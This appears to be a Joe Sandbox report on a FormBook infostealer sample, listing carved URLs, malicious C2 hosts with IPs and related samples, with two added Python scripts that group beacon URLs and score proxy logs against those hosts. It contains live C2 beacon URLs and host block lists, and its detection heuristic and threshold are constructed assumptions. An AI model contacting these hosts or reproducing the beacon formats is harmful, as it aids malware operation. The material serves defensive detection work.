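# query parameters Cj (shared across hosts) and lH (per-request blob).
BEACON_PATH = re.compile(r"^/[a-z0-9]{4}/$")

# Constructed sample set: a subset of the URLs listed in the report, kept verbatim,
# including one HTML-escaped copy and one with a truncated lH value.
REPORT_URLS = [
    "http://www.anuts.top/li0t/?Cj=Qhv8RTO8YPvh6L30&lH=cVY/NretpRV3pSqaegFyh+jFAYxH5xF9S8puWnY234sUXEzh+T0fGizPv/1GJq+MSLyulFxDkLwqIofvrKUfnjThT7p1YiNwwCR+sQ8vfCBR1TGxYf2LNfg=",
    "http://www.sandranoll.com/aroo/?Cj=Qhv8RTO8YPvh6L30&lH=bKy7FSIHmKYFjPoOU8uZGqQpeblpEQl2twFEynhtde+XdOqoRjh1sl1n+ba+sSXyFBuEELqLWRHnTW9JDkHGH0ELwMgy3j7Qb0m6Rmga/hvJBmgScr7TS3s=",
    "https://www.hprlz.cz/w6qg/?Cj=Qhv8RTO8YPvh6L30&amp;lH=0lpTRQcDUH",   # HTML-escaped, lH truncated
    "http://www.xn--fhq1c541j0zr.com/rm91/",                              # path only, no query
    "http://www.bfiworkerscomp.com/px.js?ch=2",                           # parking-page script, not a beacon
    "https://www.loopia.com/support?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parking",
    "https://duckduckgo.com/ac/?q=",                                      # browser search-engine URL
]


def normalize(url: str) -> str:
    """Undo HTML escaping (&amp;) that memory-carved URLs may carry and strip whitespace."""
    return html.unescape(url.strip())


def split_query(query: str) -> dict:
    """Split a query string WITHOUT percent/plus decoding: lH is base64-like and
    contains '+', which urllib.parse.parse_qs would silently turn into spaces."""
    params = {}
    for part in query.split("&"):
        if part:
            key, _, value = part.partition("=")
            params[key] = value
    return params


def classify(url: str):
    """Return a beacon record for URLs matching the report's C2 shape, else None.
    Path-only hits (no query) are kept with token None so the host is not lost."""
    parts = urlsplit(normalize(url))
    if not BEACON_PATH.match(parts.path):
        return None
    params = split_query(parts.query)
    if parts.query and "Cj" not in params:
        return None
    return {"host": parts.hostname, "path": parts.path,
            "token": params.get("Cj"), "lH": params.get("lH")}


def group_by_token(urls) -> dict:
    """Map each Cj token to the sorted (host, path) pairs that used it.
    URLs seen only as a bare beacon path are collected under the key None."""
    groups = defaultdict(set)
    for url in urls:
        rec = classify(url)
        if rec is not None:
            groups[rec["token"]].add((rec["host"], rec["path"]))
    return {token: sorted(pairs) for token, pairs in groups.items()}


if __name__ == "__main__":
    for token, pairs in group_by_token(REPORT_URLS).items():
        print(f"Cj={token if token else '(path only)'}")
        for host, path in pairs:
            print(f"  {host}{path}")
```

The manual query split is deliberate: the lH blobs use the `+` and `/` characters of standard base64, and a conventional parse_qs call would corrupt them before they reach any decoder or indicator store.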
URLs from memory and binaries (each entry: Name | Malicious | Antivirus Detection | Reputation, followed by the memory dumps the URL was carved from)

https://duckduckgo.com/chrome_newtab | false | Virustotal: 0% (Browse); Avira URL Cloud: safe | unknown
    Source: clip.exe, 00000003.00000003.2041038952.00000000083FE000.00000004.00000020.00020000.00000000.sdmp
https://dts.gnpge.com | false | Virustotal: 0% (Browse); Avira URL Cloud: safe | unknown
    Source: IprrrFQGqOjAyLqOuuogohDyaEetb.exe, 00000007.00000002.4136230537.0000000003BEC000.00000004.00000001.00040000.00000000.sdmp
https://duckduckgo.com/ac/?q= | false | Virustotal: 0% (Browse); Avira URL Cloud: safe | unknown
    Source: clip.exe, 00000003.00000003.2041038952.00000000083FE000.00000004.00000020.00020000.00000000.sdmp
https://www.hprlz.cz/w6qg/?Cj=Qhv8RTO8YPvh6L30&lH=0lpTRQcDUH | false | Avira URL Cloud: safe | unknown
    Source: clip.exe, 00000003.00000002.4136624660.0000000005A94000.00000004.10000000.00040000.00000000.sdmp, IprrrFQGqOjAyLqOuuogohDyaEetb.exe, 00000007.00000002.4136230537.00000000035A4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2147546281.0000000007C74000.00000004.80000000.00040000.00000000.sdmp
https://cdnjs.cloudflare.com/ajax/libs/twitter-bootstrap/4.1.3/css/bootstrap.min.css | false | Virustotal: 0% (Browse); Avira URL Cloud: safe | unknown
    Source: clip.exe, 00000003.00000002.4136624660.00000000068B6000.00000004.10000000.00040000.00000000.sdmp, IprrrFQGqOjAyLqOuuogohDyaEetb.exe, 00000007.00000002.4136230537.00000000043C6000.00000004.00000001.00040000.00000000.sdmp
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command= | false | URL Reputation: safe | unknown
    Source: clip.exe, 00000003.00000003.2041038952.00000000083FE000.00000004.00000020.00020000.00000000.sdmp
https://static.loopia.se/responsive/images/iOS-72.png | false | Virustotal: 0% (Browse); Avira URL Cloud: safe | unknown
    Source: clip.exe, 00000003.00000002.4136624660.0000000006592000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000003.00000002.4138171767.0000000008120000.00000004.00000800.00020000.00000000.sdmp, IprrrFQGqOjAyLqOuuogohDyaEetb.exe, 00000007.00000002.4136230537.00000000040A2000.00000004.00000001.00040000.00000000.sdmp
https://www.domaintechnik.at/fileadmin/gfx/logos/hostedsoft/gallery.png | false | Virustotal: 0% (Browse); Avira URL Cloud: safe | unknown
    Source: clip.exe, 00000003.00000002.4136624660.0000000006A48000.00000004.10000000.00040000.00000000.sdmp, IprrrFQGqOjAyLqOuuogohDyaEetb.exe, 00000007.00000002.4136230537.0000000004558000.00000004.00000001.00040000.00000000.sdmp
https://www.loopia.com/support?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parking | false | Virustotal: 1% (Browse); Avira URL Cloud: safe | unknown
    Source: clip.exe, 00000003.00000002.4136624660.0000000006592000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000003.00000002.4138171767.0000000008120000.00000004.00000800.00020000.00000000.sdmp, IprrrFQGqOjAyLqOuuogohDyaEetb.exe, 00000007.00000002.4136230537.00000000040A2000.00000004.00000001.00040000.00000000.sdmp
http://www.domaintechnik.at/data/gfx/dt_logo_parking.png | false | Virustotal: 0% (Browse); Avira URL Cloud: safe | unknown
    Source: clip.exe, 00000003.00000002.4136624660.0000000006A48000.00000004.10000000.00040000.00000000.sdmp, IprrrFQGqOjAyLqOuuogohDyaEetb.exe, 00000007.00000002.4136230537.0000000004558000.00000004.00000001.00040000.00000000.sdmp
http://www.bfiworkerscomp.com/px.js?ch=2 | false | Avira URL Cloud: safe | unknown
    Source: clip.exe, 00000003.00000002.4136624660.00000000060DC000.00000004.10000000.00040000.00000000.sdmp, IprrrFQGqOjAyLqOuuogohDyaEetb.exe, 00000007.00000002.4136230537.0000000003BEC000.00000004.00000001.00040000.00000000.sdmp
http://www.bfiworkerscomp.com/px.js?ch=1 | false | Avira URL Cloud: safe | unknown
    Source: clip.exe, 00000003.00000002.4136624660.00000000060DC000.00000004.10000000.00040000.00000000.sdmp, IprrrFQGqOjAyLqOuuogohDyaEetb.exe, 00000007.00000002.4136230537.0000000003BEC000.00000004.00000001.00040000.00000000.sdmp
https://static.loopia.se/shared/logo/logo-loopia-white.svg | false | Virustotal: 0% (Browse); Avira URL Cloud: safe | unknown
    Source: clip.exe, 00000003.00000002.4136624660.0000000006592000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000003.00000002.4138171767.0000000008120000.00000004.00000800.00020000.00000000.sdmp, IprrrFQGqOjAyLqOuuogohDyaEetb.exe, 00000007.00000002.4136230537.00000000040A2000.00000004.00000001.00040000.00000000.sdmp
https://www.loopia.com/login?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingwe | false | Virustotal: 1% (Browse); Avira URL Cloud: safe | unknown
    Source: clip.exe, 00000003.00000002.4136624660.0000000006592000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000003.00000002.4138171767.0000000008120000.00000004.00000800.00020000.00000000.sdmp, IprrrFQGqOjAyLqOuuogohDyaEetb.exe, 00000007.00000002.4136230537.00000000040A2000.00000004.00000001.00040000.00000000.sdmp
https://www.loopia.com/order/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingw | false | Virustotal: 1% (Browse); Avira URL Cloud: safe | unknown
    Source: clip.exe, 00000003.00000002.4136624660.0000000006592000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000003.00000002.4138171767.0000000008120000.00000004.00000800.00020000.00000000.sdmp, IprrrFQGqOjAyLqOuuogohDyaEetb.exe, 00000007.00000002.4136230537.00000000040A2000.00000004.00000001.00040000.00000000.sdmp
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search | false | URL Reputation: safe | unknown
    Source: clip.exe, 00000003.00000003.2041038952.00000000083FE000.00000004.00000020.00020000.00000000.sdmp
https://www.domaintechnik.at/fileadmin/gfx/logos/hostedsoft/joomla-2.png | false | Virustotal: 0% (Browse); Avira URL Cloud: safe | unknown
    Source: clip.exe, 00000003.00000002.4136624660.0000000006A48000.00000004.10000000.00040000.00000000.sdmp, IprrrFQGqOjAyLqOuuogohDyaEetb.exe, 00000007.00000002.4136230537.0000000004558000.00000004.00000001.00040000.00000000.sdmp
https://www.domaintechnik.at/fileadmin/gfx/logos/hostedsoft/mediawiki.png | false | Virustotal: 0% (Browse); Avira URL Cloud: safe | unknown
    Source: clip.exe, 00000003.00000002.4136624660.0000000006A48000.00000004.10000000.00040000.00000000.sdmp, IprrrFQGqOjAyLqOuuogohDyaEetb.exe, 00000007.00000002.4136230537.0000000004558000.00000004.00000001.00040000.00000000.sdmp
https://www.loopia.com/wordpress/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=park | false | Virustotal: 0% (Browse); Avira URL Cloud: safe | unknown
    Source: clip.exe, 00000003.00000002.4136624660.0000000006592000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000003.00000002.4138171767.0000000008120000.00000004.00000800.00020000.00000000.sdmp, IprrrFQGqOjAyLqOuuogohDyaEetb.exe, 00000007.00000002.4136230537.00000000040A2000.00000004.00000001.00040000.00000000.sdmp
https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css | false | Virustotal: 0% (Browse); Avira URL Cloud: safe | unknown
    Source: clip.exe, 00000003.00000002.4136624660.00000000068B6000.00000004.10000000.00040000.00000000.sdmp, IprrrFQGqOjAyLqOuuogohDyaEetb.exe, 00000007.00000002.4136230537.00000000043C6000.00000004.00000001.00040000.00000000.sdmp
https://static.loopia.se/shared/images/additional-pages-hero-shape.webp | false | Virustotal: 0% (Browse); Avira URL Cloud: safe | unknown
    Source: clip.exe, 00000003.00000002.4136624660.0000000006592000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000003.00000002.4138171767.0000000008120000.00000004.00000800.00020000.00000000.sdmp, IprrrFQGqOjAyLqOuuogohDyaEetb.exe, 00000007.00000002.4136230537.00000000040A2000.00000004.00000001.00040000.00000000.sdmp
https://static.loopia.se/shared/style/2022-extra-pages.css | false | Virustotal: 0% (Browse); Avira URL Cloud: safe | unknown
    Source: clip.exe, 00000003.00000002.4136624660.0000000006592000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000003.00000002.4138171767.0000000008120000.00000004.00000800.00020000.00000000.sdmp, IprrrFQGqOjAyLqOuuogohDyaEetb.exe, 00000007.00000002.4136230537.00000000040A2000.00000004.00000001.00040000.00000000.sdmp
https://static.loopia.se/responsive/images/iOS-114.png | false | Virustotal: 0% (Browse); Avira URL Cloud: safe | unknown
    Source: clip.exe, 00000003.00000002.4136624660.0000000006592000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000003.00000002.4138171767.0000000008120000.00000004.00000800.00020000.00000000.sdmp, IprrrFQGqOjAyLqOuuogohDyaEetb.exe, 00000007.00000002.4136230537.00000000040A2000.00000004.00000001.00040000.00000000.sdmp
https://www.google.com/images/branding/product/ico/googleg_lodp.ico | false | Virustotal: 0% (Browse); Avira URL Cloud: safe | unknown
    Source: clip.exe, 00000003.00000003.2041038952.00000000083FE000.00000004.00000020.00020000.00000000.sdmp
https://www.loopia.com/loopiadns/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=park | false | Virustotal: 1% (Browse); Avira URL Cloud: safe | unknown
    Source: clip.exe, 00000003.00000002.4136624660.0000000006592000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000003.00000002.4138171767.0000000008120000.00000004.00000800.00020000.00000000.sdmp, IprrrFQGqOjAyLqOuuogohDyaEetb.exe, 00000007.00000002.4136230537.00000000040A2000.00000004.00000001.00040000.00000000.sdmp
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q= | false | Virustotal: 0% (Browse); Avira URL Cloud: safe | unknown
    Source: clip.exe, 00000003.00000003.2041038952.00000000083FE000.00000004.00000020.00020000.00000000.sdmp
http://www.bfiworkerscomp.com/sk-logabpstatus.php?a=UjNZQ0VuZmNSTGxudFk1ejYxKzNaQ0FiYW43cEtXaFhmSFFT | false | Avira URL Cloud: safe | unknown
    Source: clip.exe, 00000003.00000002.4136624660.00000000060DC000.00000004.10000000.00040000.00000000.sdmp, IprrrFQGqOjAyLqOuuogohDyaEetb.exe, 00000007.00000002.4136230537.0000000003BEC000.00000004.00000001.00040000.00000000.sdmp
http://whois.loopia.com/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingweb&ut | false | Virustotal: 0% (Browse); Avira URL Cloud: safe | unknown
    Source: clip.exe, 00000003.00000002.4136624660.0000000006592000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000003.00000002.4138171767.0000000008120000.00000004.00000800.00020000.00000000.sdmp, IprrrFQGqOjAyLqOuuogohDyaEetb.exe, 00000007.00000002.4136230537.00000000040A2000.00000004.00000001.00040000.00000000.sdmp
https://www.ecosia.org/newtab/ | false | URL Reputation: safe | unknown
    Source: clip.exe, 00000003.00000003.2041038952.00000000083FE000.00000004.00000020.00020000.00000000.sdmp
https://static.loopia.se/responsive/styles/reset.css | false | Virustotal: 0% (Browse); Avira URL Cloud: safe | unknown
    Source: clip.exe, 00000003.00000002.4136624660.0000000006592000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000003.00000002.4138171767.0000000008120000.00000004.00000800.00020000.00000000.sdmp, IprrrFQGqOjAyLqOuuogohDyaEetb.exe, 00000007.00000002.4136230537.00000000040A2000.00000004.00000001.00040000.00000000.sdmp
https://ac.ecosia.org/autocomplete?q= | false | URL Reputation: safe | unknown
    Source: clip.exe, 00000003.00000003.2041038952.00000000083FE000.00000004.00000020.00020000.00000000.sdmp
https://static.loopia.se/responsive/images/iOS-57.png | false | Avira URL Cloud: safe | unknown
    Source: clip.exe, 00000003.00000002.4136624660.0000000006592000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000003.00000002.4138171767.0000000008120000.00000004.00000800.00020000.00000000.sdmp, IprrrFQGqOjAyLqOuuogohDyaEetb.exe, 00000007.00000002.4136230537.00000000040A2000.00000004.00000001.00040000.00000000.sdmp
https://cdnjs.cloudflare.com/ajax/libs/gsap/3.1.1/gsap.min.js | false | Avira URL Cloud: safe | unknown
    Source: clip.exe, 00000003.00000002.4136624660.00000000068B6000.00000004.10000000.00040000.00000000.sdmp, IprrrFQGqOjAyLqOuuogohDyaEetb.exe, 00000007.00000002.4136230537.00000000043C6000.00000004.00000001.00040000.00000000.sdmp
https://www.loopia.com/sitebuilder/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=pa | false | Avira URL Cloud: safe | unknown
    Source: clip.exe, 00000003.00000002.4136624660.0000000006592000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000003.00000002.4138171767.0000000008120000.00000004.00000800.00020000.00000000.sdmp, IprrrFQGqOjAyLqOuuogohDyaEetb.exe, 00000007.00000002.4136230537.00000000040A2000.00000004.00000001.00040000.00000000.sdmp
https://www.hprlz.cz/w6qg/?Cj=Qhv8RTO8YPvh6L30&amp;lH=0lpTRQcDUH | false | Avira URL Cloud: safe | unknown
    Source: clip.exe, 00000003.00000002.4136624660.0000000005A94000.00000004.10000000.00040000.00000000.sdmp, IprrrFQGqOjAyLqOuuogohDyaEetb.exe, 00000007.00000002.4136230537.00000000035A4000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2147546281.0000000007C74000.00000004.80000000.00040000.00000000.sdmp
https://www.loopia.com/domainnames/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=pa | false | Avira URL Cloud: safe | unknown
    Source: clip.exe, 00000003.00000002.4136624660.0000000006592000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000003.00000002.4138171767.0000000008120000.00000004.00000800.00020000.00000000.sdmp, IprrrFQGqOjAyLqOuuogohDyaEetb.exe, 00000007.00000002.4136230537.00000000040A2000.00000004.00000001.00040000.00000000.sdmp
http://www.dmtxwuatbz.cc | false | Avira URL Cloud: safe | unknown
    Source: IprrrFQGqOjAyLqOuuogohDyaEetb.exe, 00000007.00000002.4137645641.000000000564B000.00000040.80000000.00040000.00000000.sdmp
https://www.loopia.com/hosting/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkin | false | Avira URL Cloud: safe | unknown
    Source: clip.exe, 00000003.00000002.4136624660.0000000006592000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000003.00000002.4138171767.0000000008120000.00000004.00000800.00020000.00000000.sdmp, IprrrFQGqOjAyLqOuuogohDyaEetb.exe, 00000007.00000002.4136230537.00000000040A2000.00000004.00000001.00040000.00000000.sdmp
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q= | false | URL Reputation: safe | unknown
    Source: clip.exe, 00000003.00000003.2041038952.00000000083FE000.00000004.00000020.00020000.00000000.sdmp
https://www.loopia.com/woocommerce/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=pa | false | Avira URL Cloud: safe | unknown
    Source: clip.exe, 00000003.00000002.4136624660.0000000006592000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000003.00000002.4138171767.0000000008120000.00000004.00000800.00020000.00000000.sdmp, IprrrFQGqOjAyLqOuuogohDyaEetb.exe, 00000007.00000002.4136230537.00000000040A2000.00000004.00000001.00040000.00000000.sdmp
https://www.loopia.se?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingweb | false | Avira URL Cloud: safe | unknown
    Source: clip.exe, 00000003.00000002.4136624660.0000000006592000.00000004.10000000.00040000.00000000.sdmp, clip.exe, 00000003.00000002.4138171767.0000000008120000.00000004.00000800.00020000.00000000.sdmp, IprrrFQGqOjAyLqOuuogohDyaEetb.exe, 00000007.00000002.4136230537.00000000040A2000.00000004.00000001.00040000.00000000.sdmp
https://www.domaintechnik.at/fileadmin/gfx/icons/cp/64x64/mysql.png | false | Avira URL Cloud: safe | unknown
    Source: clip.exe, 00000003.00000002.4136624660.0000000006A48000.00000004.10000000.00040000.00000000.sdmp, IprrrFQGqOjAyLqOuuogohDyaEetb.exe, 00000007.00000002.4136230537.0000000004558000.00000004.00000001.00040000.00000000.sdmp
IP | Domain | Country | ASN | ASN Name | Malicious
23.251.54.212 | www.anuts.top | United States | 62468 | VPSQUANUS | true
213.145.228.16 | www.sandranoll.com | Austria | 25575 | DOMAINTECHNIKAT | true
104.21.45.56 | www.dmtxwuatbz.cc | United States | 13335 | CLOUDFLARENETUS | true
194.9.94.85 | www.xn--matfrmn-jxa4m.se | Sweden | 39570 | LOOPIASE | true
5.44.111.162 | www.hprlz.cz | Germany | 45031 | PROVIDERBOXIPv4IPv6DUS1DE | true
217.160.0.106 | www.catherineviskadi.com | Germany | 8560 | ONEANDONE-ASBrauerstrasse48DE | true
208.91.197.27 | www.bfiworkerscomp.com | Virgin Islands (BRITISH) | 40034 | CONFLUENCE-NETWORK-INCVG | true
91.195.240.19 | parkingpage.namecheap.com | Germany | 47846 | SEDO-ASDE | true
199.192.19.19 | www.telwisey.info | United States | 22612 | NAMECHEAP-NETUS | true
43.252.167.188 | www.xn--fhq1c541j0zr.com | Hong Kong | 38277 | CLINK-AS-APCommuniLinkInternetLimitedHK | true
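Added triage example, not part of the Joe Sandbox report: the per-URL reputation lookups above return "safe" even for https://www.hprlz.cz/w6qg/?Cj=Qhv8RTO8YPvh6L30&lH=0lpTRQcDUH, although the IP/domain table marks www.hprlz.cz as malicious, so a detection engineer pairs the domain IOCs with a shape heuristic for the beacon URIs rather than relying on reputation alone. The script below scores proxy-log URLs against the malicious hosts listed in this report plus a heuristic derived only from the URIs visible on this page (one four-character directory, optionally followed by a two-parameter query with base64-like values). The heuristic, the scoring weights and threshold, the log format, the `.test` host and the log lines themselves are constructed assumptions for the example, not a published FormBook signature.

```python
"""Score proxy-log URLs against this report's C2 hosts and a beacon-shape heuristic.
Python 3.8+, standard library only. Added example, not part of the sandbox report."""
import re
from dataclasses import dataclass, field
from typing import List, Tuple
from urllib.parse import urlsplit

# Hosts the report's IP/domain table marks "Malicious: true".
KNOWN_C2_HOSTS = {
    "www.anuts.top", "www.sandranoll.com", "www.dmtxwuatbz.cc",
    "www.xn--matfrmn-jxa4m.se", "www.hprlz.cz", "www.catherineviskadi.com",
    "www.bfiworkerscomp.com", "www.telwisey.info", "www.xn--fhq1c541j0zr.com",
}

# ASSUMED heuristic, derived only from the URIs visible in this report
# (/w6qg/?Cj=...&lH=..., /niik/?wp=...&PRT4=..., /li0t/, /aroo/): one four-character
# lower-case alphanumeric directory, optionally followed by exactly two short-keyed
# parameters whose values look like base64.
SHORT_DIR_RE = re.compile(r"^/[a-z0-9]{4}/$")
PARAM_KEY_RE = re.compile(r"^[A-Za-z0-9]{2,4}$")
B64ISH_RE = re.compile(r"^[A-Za-z0-9+/]+={0,2}$")


@dataclass
class Verdict:
    host: str
    path: str
    score: int = 0
    reasons: List[str] = field(default_factory=list)

    @property
    def suspicious(self) -> bool:
        return self.score >= 3  # threshold is an assumption; tune on your own traffic


def _split_query(query: str) -> List[Tuple[str, str]]:
    """Split a query string without percent-decoding, so '+' and '/' in base64 survive."""
    if not query:
        return []
    return [tuple(chunk.partition("=")[::2]) for chunk in query.split("&")]


def score_url(url: str) -> Verdict:
    """Score one URL: known host = 3, four-char directory = 1, two-parameter beacon = 2."""
    if "://" not in url:
        url = "http://" + url  # the report also lists bare host/path forms
    parts = urlsplit(url)
    v = Verdict(host=parts.hostname or "", path=parts.path)
    if v.host in KNOWN_C2_HOSTS:
        v.score += 3
        v.reasons.append("known_c2_host")
    if SHORT_DIR_RE.match(v.path):
        v.score += 1
        v.reasons.append("four_char_dir")
    params = _split_query(parts.query)
    if len(params) == 2 and all(PARAM_KEY_RE.match(k) and B64ISH_RE.match(val) for k, val in params):
        v.score += 2
        v.reasons.append("two_param_beacon")
    return v


# Constructed proxy log: "timestamp src_ip method url status". Lines 1-2 reuse URIs
# from the report; line 3 is an invented host on a .test TLD; lines 4-5 are benign
# URLs that also appear in the report's URL list.
PROXY_LOG = """\
2024-08-19T02:27:10Z 10.0.0.5 GET https://www.hprlz.cz/w6qg/?Cj=Qhv8RTO8YPvh6L30&lH=0lpTRQcDUH 200
2024-08-19T02:27:41Z 10.0.0.5 GET http://www.anuts.top/niik/?wp=Y4bXb&PRT4=H/YiygX9KITTv7luV6yUPKrN50P+s1tzENv79uR8DwTDmQwOwNUPDlYEBevB1BzVmv2ACSfGFUmX0UJ7u9Bld+nnTqDy3OkaCqYdjJlbok8OnyXr0/DiKgU= 200
2024-08-19T02:28:02Z 10.0.0.5 POST http://www.example-unknown.test/ab3x/?Q1=aGVsbG8&Zz9=d29ybGQ= 404
2024-08-19T02:28:30Z 10.0.0.7 GET https://www.loopia.com/hosting/?utm_medium=sitelink&utm_source=loopia_parkingweb&utm_campaign=parkingweb 200
2024-08-19T02:29:00Z 10.0.0.7 GET https://cdn.ecosia.org/assets/images/ico/favicon.ico 200
"""


def triage_log(text: str) -> List[Verdict]:
    """Return verdicts for every log line whose URL scores as suspicious."""
    hits = []
    for line in text.splitlines():
        fields = line.split()
        if len(fields) < 5:
            continue
        v = score_url(fields[3])
        if v.suspicious:
            hits.append(v)
    return hits


if __name__ == "__main__":
    for hit in triage_log(PROXY_LOG):
        print(f"{hit.score:2d} {hit.host:<28} {hit.path:<10} {','.join(hit.reasons)}")
```

The third constructed line shows why the shape heuristic is kept separate from the host list: an unlisted host with a `/ab3x/?Q1=...&Zz9=...` request still crosses the threshold on shape alone, while the loopia.com and ecosia.org entries from the report's own URL list score zero.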
                Joe Sandbox version:40.0.0 Tourmaline
                Analysis ID:1494709
                Start date and time:2024-08-19 04:25:06 +02:00
                Joe Sandbox product:CloudBasic
                Overall analysis duration:0h 9m 56s
                Hypervisor based Inspection enabled:false
                Report type:full
                Cookbook file name:default.jbs
                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed:8
                Number of new started drivers analysed:0
                Number of existing processes analysed:0
                Number of existing drivers analysed:0
                Number of injected processes analysed:2
                Technologies:
                • HCA enabled
                • EGA enabled
                • AMSI enabled
                Analysis Mode:default
                Analysis stop reason:Timeout
                Sample name:Arrival Notice.exe
                Detection:MAL
                Classification:mal100.troj.spyw.evad.winEXE@7/5@15/10
                EGA Information:
                • Successful, ratio: 75%
                HCA Information:
                • Successful, ratio: 97%
                • Number of executed functions: 47
                • Number of non-executed functions: 293
                Cookbook Comments:
                • Found application associated with file extension: .exe
                • Override analysis time to 240000 for current running targets taking high CPU consumption
                • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                • Execution Graph export aborted for target IprrrFQGqOjAyLqOuuogohDyaEetb.exe, PID 1516 because it is empty
• Not all processes were analyzed, report is missing behavior information
                • Report creation exceeded maximum time and may have missing disassembly code information.
                • Report size exceeded maximum capacity and may have missing disassembly code.
                • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Time | Type | Description
22:26:52 | API Interceptor | 11913339x Sleep call for process: clip.exe modified
Match | Associated Sample Name / URL | Detection | Threat Name | Context
23.251.54.212 | shipping documents.exe | malicious | FormBook | www.anuts.top/li0t/
23.251.54.212 | MV Sunshine, ORDER.exe | malicious | FormBook | www.anuts.top/li0t/
23.251.54.212 | PAYROLL SUMMARY _pdf.exe | malicious | FormBook | www.anuts.top/li0t/
23.251.54.212 | LisectAVT_2403002B_466.exe | malicious | FormBook | www.anuts.top/d5fo/
23.251.54.212 | TOgpmvvWoj.exe | malicious | FormBook | www.anuts.top/li0t/
23.251.54.212 | Attendance list.exe | malicious | FormBook | www.anuts.top/li0t/
23.251.54.212 | Payment_Advice.pdf.exe | malicious | FormBook | www.anuts.top/niik/
23.251.54.212 | BL7247596940.pdf.exe | malicious | FormBook | www.anuts.top/niik/?wp=Y4bXb&PRT4=H/YiygX9KITTv7luV6yUPKrN50P+s1tzENv79uR8DwTDmQwOwNUPDlYEBevB1BzVmv2ACSfGFUmX0UJ7u9Bld+nnTqDy3OkaCqYdjJlbok8OnyXr0/DiKgU=
23.251.54.212 | Arrival Notice.pdf.exe | malicious | FormBook, PureLog Stealer | www.anuts.top/niik/
213.145.228.16 | shipping documents.exe | malicious | FormBook | www.sandranoll.com/aroo/
213.145.228.16 | MV Sunshine, ORDER.exe | malicious | FormBook | www.sandranoll.com/aroo/
213.145.228.16 | PAYROLL SUMMARY _pdf.exe | malicious | FormBook | www.sandranoll.com/aroo/
213.145.228.16 | LisectAVT_2403002A_87.exe | malicious | FormBook | www.sandranoll.com/4bud/
213.145.228.16 | bJrO2iUerN.elf | malicious | Unknown | strg.or.at/wordpress/wp-login.php
213.145.228.16 | TOgpmvvWoj.exe | malicious | FormBook | www.sandranoll.com/aroo/
213.145.228.16 | Attendance list.exe | malicious | FormBook | www.sandranoll.com/aroo/
213.145.228.16 | Navana Pharmaceuticals PLC.pdf.exe | malicious | FormBook | www.sandranoll.com/zg5v/
213.145.228.16 | Swift Message.pdf.exe | malicious | FormBook | www.sandranoll.com/cga5/
213.145.228.16 | 1LZvA2cEfV.exe | malicious | FormBook, PureLog Stealer | www.sandranoll.com/4bud/
Match | Associated Sample Name / URL | Detection | Threat Name | Context
www.sandranoll.com | shipping documents.exe | malicious | FormBook | 213.145.228.16
www.sandranoll.com | MV Sunshine, ORDER.exe | malicious | FormBook | 213.145.228.16
www.sandranoll.com | PAYROLL SUMMARY _pdf.exe | malicious | FormBook | 213.145.228.16
www.sandranoll.com | LisectAVT_2403002A_87.exe | malicious | FormBook | 213.145.228.16
www.sandranoll.com | TOgpmvvWoj.exe | malicious | FormBook | 213.145.228.16
www.sandranoll.com | Attendance list.exe | malicious | FormBook | 213.145.228.16
www.sandranoll.com | Navana Pharmaceuticals PLC.pdf.exe | malicious | FormBook | 213.145.228.16
www.sandranoll.com | Swift Message.pdf.exe | malicious | FormBook | 213.145.228.16
www.sandranoll.com | 1LZvA2cEfV.exe | malicious | FormBook, PureLog Stealer | 213.145.228.16
www.sandranoll.com | Payment Details- scanslip000002343.exe | malicious | FormBook | 213.145.228.16
www.dmtxwuatbz.cc | shipping documents.exe | malicious | FormBook | 172.67.210.102
www.dmtxwuatbz.cc | MV Sunshine, ORDER.exe | malicious | FormBook | 104.21.45.56
www.dmtxwuatbz.cc | PAYROLL SUMMARY _pdf.exe | malicious | FormBook | 172.67.210.102
www.dmtxwuatbz.cc | TOgpmvvWoj.exe | malicious | FormBook | 172.67.210.102
www.dmtxwuatbz.cc | Attendance list.exe | malicious | FormBook | 172.67.210.102
